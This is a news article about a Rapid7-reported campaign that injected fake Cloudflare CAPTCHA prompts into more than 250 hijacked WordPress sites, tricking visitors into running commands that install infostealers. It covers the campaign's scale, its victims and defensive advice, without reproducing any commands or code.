WordPress sites hijacked to spread infostealers via fake CAPTCHA prompts

Cybercriminals have compromised more than 250 legitimate WordPress websites worldwide, including the campaign site of a US Senate candidate, to distribute infostealer malware through convincing fake CAPTCHA prompts.

The attack, detailed by Rapid7 researchers, injects malicious code into compromised WordPress sites that serve visitors a fake Cloudflare CAPTCHA page. Instead of the typical "I'm not a robot" checkbox, these prompts instruct users to copy and execute a command on their machine, which triggers the download of credential-stealing malware.

How the attack works

The scheme exploits the familiarity of Cloudflare's bot protection, which has become ubiquitous across the modern web. Visitors encountering what appears to be yet another verification step are instead being walked through the initial phase of infecting their own systems.

This technique follows the ClickFix social engineering playbook, where attackers persuade victims to execute commands themselves while believing they're completing a legitimate verification process. The malicious code is injected into otherwise legitimate websites, making the attack particularly effective since users trust the sites they're visiting.

Scale and scope

According to Rapid7, the compromised websites represent a diverse range of organizations. Beyond the US Senate candidate's official webpage, affected sites include regional media outlets, small business websites, and various other legitimate domains.

The campaign has been active since at least December 2025, though some infrastructure dates back to July and August of the previous year. Rapid7 identified over 250 compromised websites across at least 12 countries: Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK, and the US.

Technical sophistication

"The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort," said Rapid7 security researcher Milan Spinka.

The automation aspect is particularly concerning, as it indicates this isn't a manual, one-by-one compromise but rather a coordinated campaign using sophisticated tools and techniques.

What happens after infection

Once victims follow the instructions on the fake verification page, the attack chain installs infostealer malware designed to quietly harvest valuable data from infected machines. This typically includes:

• Browser-stored credentials and authentication cookies
• Cryptocurrency wallet information
• Other sensitive digital information

These stolen credentials rarely remain with the original attackers. Infostealer logs are routinely packaged and sold on cybercrime marketplaces, where other criminals can purchase ready-made access to email accounts, corporate systems, and online services without having to conduct their own breaches.

Why compromised websites are effective delivery mechanisms

Using legitimate websites as the delivery mechanism provides attackers with crucial camouflage. Security tools and users alike are far less suspicious of well-known, trusted domains than newly registered malware sites. The attackers effectively piggyback on the reputation and trust of whoever's website has been compromised.

Rapid7 has notified US authorities to investigate the issue and coordinate cleanup efforts. The inclusion of a US Senate candidate's campaign site among the compromised domains underscores the potential political implications of this campaign.

The attack highlights the ongoing challenge of securing WordPress installations and the creative ways cybercriminals exploit trusted web infrastructure to distribute malware. For website administrators, this serves as a reminder to maintain updated WordPress installations, use strong authentication, and monitor for unauthorized code changes.